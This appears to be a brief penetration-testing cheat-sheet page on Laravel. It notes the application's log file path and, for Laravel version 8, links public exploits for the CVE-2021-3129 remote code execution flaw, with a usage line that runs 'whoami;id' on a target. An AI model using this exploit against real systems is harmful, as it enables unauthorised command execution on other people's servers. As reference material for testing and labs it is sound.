> For the complete documentation index, see [llms.txt](https://kashz.gitbook.io/kashz-jewels/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://kashz.gitbook.io/kashz-jewels/services/laravel.md).

# laravel

### Interesting Paths

```
# log file path
APP-NAME/storage/logs/laravel.log
```

## Laravel RCE

v 8

```
https://github.com/nth347/CVE-2021-3129_exploit
python3 exploit.py http://IP:PORT Monolog/RCE1 "whoami;id"


https://github.com/zhzyker/CVE-2021-3129
```
